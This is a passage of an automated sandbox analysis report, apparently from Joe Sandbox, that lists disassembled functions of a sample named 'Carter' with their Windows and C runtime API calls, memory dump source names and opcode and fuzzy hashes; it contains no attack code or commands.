                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: SleepTimetime
                                                                            • String ID:
                                                                            • API String ID: 346578373-0
                                                                            • Opcode ID: d59759364340a3ee7a76abf1a657f7644b1e0de6d50fa8c41f581d0f7e8a90ce
                                                                            • Instruction ID: e0301fd286f9ca04b668f1c3c51d3e4d5058128b06268aec21f405d42c721130
                                                                            • Opcode Fuzzy Hash: d59759364340a3ee7a76abf1a657f7644b1e0de6d50fa8c41f581d0f7e8a90ce
                                                                            • Instruction Fuzzy Hash: 5FF0FE312506129FD354AB69D455B66B7E8AB49750F01806AE42EC7351DB70AC50CB91
                                                                            Function 00295E80 Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __lock_file.LIBCMT ref: 00295EB4
                                                                            • __ftell_nolock.LIBCMT ref: 00295EBF
                                                                              • Part of subcall function 00298D58: __getptd_noexit.LIBCMT ref: 00298D58
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: __ftell_nolock__getptd_noexit__lock_file
                                                                            • String ID:
                                                                            • API String ID: 2999321469-0
                                                                            • Opcode ID: 7a96e2141c02ad46cf6b24c3dff398ba52567b74cb776e9a9e0a81a1d6891335
                                                                            • Instruction ID: 7a6a03df058960312ead74816831251f0adcf776ea82f76d43126fd49e0a23bf
                                                                            • Opcode Fuzzy Hash: 7a96e2141c02ad46cf6b24c3dff398ba52567b74cb776e9a9e0a81a1d6891335
                                                                            • Instruction Fuzzy Hash: 8AF0EC32A31A259ADF02BB74880375E72D06F02335F694206F424EB1C2CF784F229F55
                                                                            Function 00285AC3 Relevance: 3.0, APIs: 2, Instructions: 25windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 00285AEF
                                                                            • Shell_NotifyIconW.SHELL32(00000002,?), ref: 00285B1F
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: IconNotifyShell__memset
                                                                            • String ID:
                                                                            • API String ID: 928536360-0
                                                                            • Opcode ID: 873615511fa2e8f7d179055f322874de21b8d9cd97e67e8271d7e88189f58bf5
                                                                            • Instruction ID: f3558612e3354ec7f94affe9a3aadf1a6df6372ade1024bba5bc9d99460d5c54
                                                                            • Opcode Fuzzy Hash: 873615511fa2e8f7d179055f322874de21b8d9cd97e67e8271d7e88189f58bf5
                                                                            • Instruction Fuzzy Hash: 6AF0A7B08183189FD7A3DF64DC8579677BC970030CF0001EAAA48D6296DB710B98CF55
                                                                            Function 002EC355 Relevance: 1.8, APIs: 1, Instructions: 288COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: LoadString$__swprintf
                                                                            • String ID:
                                                                            • API String ID: 207118244-0
                                                                            • Opcode ID: 35974aff69a390c6c8e4bcd6025c393a9b77ecf331db9185f8f4b93ebc3d438f
                                                                            • Instruction ID: 9669cffad0ef3f36d323502b17e4983bc5691264946f5b51d81832f886c6a58b
                                                                            • Opcode Fuzzy Hash: 35974aff69a390c6c8e4bcd6025c393a9b77ecf331db9185f8f4b93ebc3d438f
                                                                            • Instruction Fuzzy Hash: 4EB18D34A1014ADFCB14EF99C891DEEB7B5FF48710F60811AF915A7291EB70A962CF90
                                                                            Function 0027A820 Relevance: 1.7, APIs: 1, Instructions: 193COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: e0e5af78225d6d3d36f6d680479f726b6aede2d0f2297c8db7b636f6276ddc96
                                                                            • Instruction ID: 3e46d5d7c6fb6977801e11eeda7a2362a41e44c4d03f53f60fb0b4f8dbb8ec34
                                                                            • Opcode Fuzzy Hash: e0e5af78225d6d3d36f6d680479f726b6aede2d0f2297c8db7b636f6276ddc96
                                                                            • Instruction Fuzzy Hash: F661DE70620206DFCB10DF60C881ABEB7E5EF84360F11816DE91A8B291D7B4EDA0CB52
                                                                            Function 0027D679 Relevance: 1.7, APIs: 1, Instructions: 171COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 5f0856c66e5ef28d16953a7f6424f218d28f80febe15a9b1c355c9e021ce2ec2
                                                                            • Instruction ID: 0c7c5b5e460cb7d97f1f71c8aa4696a4d1122d5a120e290deb7b42b28105e741
                                                                            • Opcode Fuzzy Hash: 5f0856c66e5ef28d16953a7f6424f218d28f80febe15a9b1c355c9e021ce2ec2
                                                                            • Instruction Fuzzy Hash: 27518D356206159BCF14FF68C991FAE73A6AF49750F148458F80AAB392CB30ED21CF80
                                                                            Function 0028343F Relevance: 1.6, APIs: 1, Instructions: 103COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: _memmove
                                                                            • String ID:
                                                                            • API String ID: 4104443479-0
                                                                            • Opcode ID: c9f64c45f400e17b5458663199bf4a27315daf1ddd9ff02163ddc624897d631a
                                                                            • Instruction ID: 979b6ae8c367c9b529f3dbc4573f18b6a634fc1438dda79ae650543353506799
                                                                            • Opcode Fuzzy Hash: c9f64c45f400e17b5458663199bf4a27315daf1ddd9ff02163ddc624897d631a
                                                                            • Instruction Fuzzy Hash: CE31D279225A03DFC724EF19D480A21F7A0FF09B10754C56DE88A8B7A1DB70EDA1CB80
                                                                            Function 0028410A Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SetFilePointerEx.KERNEL32(00000000,?,00000001,00000000,00000000,00000000,00000000,00000000), ref: 002841B2
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: FilePointer
                                                                            • String ID:
                                                                            • API String ID: 973152223-0
                                                                            • Opcode ID: 88cbbdcd4850bc03ea37e3c7e7a112a1c4e8921c942356e740845eeec2c6b4d1
                                                                            • Instruction ID: 1cea72ad7877d1d3a84c60c8a68509a636e096142ca94a6f623e2769ccd50b26
                                                                            • Opcode Fuzzy Hash: 88cbbdcd4850bc03ea37e3c7e7a112a1c4e8921c942356e740845eeec2c6b4d1
                                                                            • Instruction Fuzzy Hash: EB318D75A1171BAFDB18EF2CC884A5DB7B5FF58310F148619E81993744D770BDA08B90
                                                                            Function 002AE2DF Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: ClearVariant
                                                                            • String ID:
                                                                            • API String ID: 1473721057-0
                                                                            • Opcode ID: 01c149c19e73d5d34767b0568b355f52d55954df0b98ed825f740ef6c2fe2163
                                                                            • Instruction ID: 1feb7c48965d8f38ea5adaae9244f8e852a8673ecc56c8fb7a13bd790b9d6abc
                                                                            • Opcode Fuzzy Hash: 01c149c19e73d5d34767b0568b355f52d55954df0b98ed825f740ef6c2fe2163
                                                                            • Instruction Fuzzy Hash: 824116745187518FDB14DF15C498B1ABBE1BF45308F0988ACE8899B362C772E8A5CF52
                                                                            Function 002849C2 Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00284B29: FreeLibrary.KERNEL32(00000000,?), ref: 00284B63
                                                                              • Part of subcall function 0029547B: __wfsopen.LIBCMT ref: 00295486
                                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,002827AF,?,00000001), ref: 002849F4
                                                                              • Part of subcall function 00284ADE: FreeLibrary.KERNEL32(00000000), ref: 00284B18
                                                                              • Part of subcall function 002848B0: _memmove.LIBCMT ref: 002848FA
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Library$Free$Load__wfsopen_memmove
                                                                            • String ID:
                                                                            • API String ID: 1396898556-0
                                                                            • Opcode ID: efed6cfcc902b27ac91cbbbd91368af6254158eb7a7aedbbae5e47054ea24ac3
                                                                            • Instruction ID: 48eed070100ab17a71939e99d696cd5b29b228b854d5f9a66b114d1dac08fb46
                                                                            • Opcode Fuzzy Hash: efed6cfcc902b27ac91cbbbd91368af6254158eb7a7aedbbae5e47054ea24ac3
                                                                            • Instruction Fuzzy Hash: 1E110835671216ABCB18FF60CC22FAE76A99F40701F10841DF941AA1C1EE749A20AF94
                                                                            Function 002AE3C2 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: ClearVariant
                                                                            • String ID:
                                                                            • API String ID: 1473721057-0
                                                                            • Opcode ID: 0b5ba63b443926817dd58069e96eeb15336b8a02520d3bb54debac5164c8810d
                                                                            • Instruction ID: bb01f731d40f7a6a55cf4fdac261a22a6ffd1a04f375e5692dee7c627332f95e
                                                                            • Opcode Fuzzy Hash: 0b5ba63b443926817dd58069e96eeb15336b8a02520d3bb54debac5164c8810d
                                                                            • Instruction Fuzzy Hash: 72213374528352CFCB14DF14C458B1ABBE4BF84304F098968F88A57322C731E869CF92
                                                                            Function 00284220 Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ReadFile.KERNEL32(00000000,?,00010000,00000000,00000000,00000000,00000000,00010000,?,00283CF8,00000000,00010000,00000000,00000000,00000000,00000000), ref: 00284276
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: FileRead
                                                                            • String ID:
                                                                            • API String ID: 2738559852-0
                                                                            • Opcode ID: 1bcd8f17a24c75f6e5d5e83f04a31e40471454c14b32bd87f8d595f7b40b5e9b
                                                                            • Instruction ID: 3904609d9bd2e05e512f46d7b4ed6b32190019c45e22d8c29e55984325794dbf
                                                                            • Opcode Fuzzy Hash: 1bcd8f17a24c75f6e5d5e83f04a31e40471454c14b32bd87f8d595f7b40b5e9b
                                                                            • Instruction Fuzzy Hash: A1118F392197029FD330EF55C480B62B7F8EF44710F14C91EE8AA86694D7B0F854CB50
                                                                            Function 00281A36 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: _memmove
                                                                            • String ID:
                                                                            • API String ID: 4104443479-0
                                                                            • Opcode ID: 602e865249ec947d912e947e17fccc617bf4509f125e4f05857fa8c8b0e3221e
                                                                            • Instruction ID: 5011f36270a59557a8d7a9f621a0899845dcf1eab615142909aec14cfa8203ce
                                                                            • Opcode Fuzzy Hash: 602e865249ec947d912e947e17fccc617bf4509f125e4f05857fa8c8b0e3221e
                                                                            • Instruction Fuzzy Hash: D601D6722217066ED7246F38DC02B67BB98DB447A0F10852AF92ACA1D1EA71E570CB90
                                                                            Function 002E495B Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetEnvironmentVariableW.KERNEL32(?,?,00007FFF,00000000), ref: 002E4998
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: EnvironmentVariable
                                                                            • String ID:
                                                                            • API String ID: 1431749950-0
                                                                            • Opcode ID: 6e4e6552f804fb6c2128da4ce0674c01f467e5b0de7230e19afc5fa70f2b77be
                                                                            • Instruction ID: ccd91ff9ee5b5585cf6fb47ccd631374aa5adf07e0d5d0b1cb58119531cbd38d
                                                                            • Opcode Fuzzy Hash: 6e4e6552f804fb6c2128da4ce0674c01f467e5b0de7230e19afc5fa70f2b77be
                                                                            • Instruction Fuzzy Hash: E7F04435618109AFCB14FF65D846C9F77BCEF45720B004056F8089B251DE71BD61CB50
                                                                            Function 002D7C7F Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00290FE6: std::exception::exception.LIBCMT ref: 0029101C
                                                                              • Part of subcall function 00290FE6: __CxxThrowException@8.LIBCMT ref: 00291031
                                                                            • _memset.LIBCMT ref: 002D7CB4
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Exception@8Throw_memsetstd::exception::exception
                                                                            • String ID:
                                                                            • API String ID: 525207782-0
                                                                            • Opcode ID: 5db2a621b77f9f51e6d0df2e5d73dbc3d80b50fddd4bc919c38652e4ccf84bab
                                                                            • Instruction ID: bd91e58cf7d663b8ba81ca67ad2cb97737d862cbcd66cdea8fa9f590025b844e
                                                                            • Opcode Fuzzy Hash: 5db2a621b77f9f51e6d0df2e5d73dbc3d80b50fddd4bc919c38652e4ccf84bab
                                                                            • Instruction Fuzzy Hash: 5A01F6742182049FD721EF5CD541F45BBE1AF59710F24C45AF5888B392DB72E920CF91
                                                                            Function 002ADC5A Relevance: 1.5, APIs: 1, Instructions: 32COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00290FE6: std::exception::exception.LIBCMT ref: 0029101C
                                                                              • Part of subcall function 00290FE6: __CxxThrowException@8.LIBCMT ref: 00291031
                                                                            • _memmove.LIBCMT ref: 002ADC8B
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Exception@8Throw_memmovestd::exception::exception
                                                                            • String ID:
                                                                            • API String ID: 1602317333-0
                                                                            • Opcode ID: 622f045ca02a7aa9060e93de149df61a25bdc93ff1b8cc602b6dbfb0cb7149fa
                                                                            • Instruction ID: 3a0741d6cc793468e4f3cfed6dcba90a1ee31422be5433deb0167ed4d6832827
                                                                            • Opcode Fuzzy Hash: 622f045ca02a7aa9060e93de149df61a25bdc93ff1b8cc602b6dbfb0cb7149fa
                                                                            • Instruction Fuzzy Hash: 8EF01D74614102DFDB11DF68C981E15BBE1BF1A710B24849CE58D8B3A2EB73E921CF91
                                                                            Function 00284A8C Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: _fseek
                                                                            • String ID:
                                                                            • API String ID: 2937370855-0
                                                                            • Opcode ID: d626904f6cb88cfd62378aba53a4cab051f17c1c31bafaeec442f62cde18398f
                                                                            • Instruction ID: a01285ea70db922baef0217c24fd1bb2bbb5016df2c694ebd8a6d3f9d89534ae
                                                                            • Opcode Fuzzy Hash: d626904f6cb88cfd62378aba53a4cab051f17c1c31bafaeec442f62cde18398f
                                                                            • Instruction Fuzzy Hash: 59F085BA510208FFDF159F84DC00DEBBBB9EB89720F00419CF9045A210D272EA218BA0
                                                                            Function 00284A2F Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • FreeLibrary.KERNEL32(?,?,?,002827AF,?,00000001), ref: 00284A63
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: FreeLibrary
                                                                            • String ID:
                                                                            • API String ID: 3664257935-0
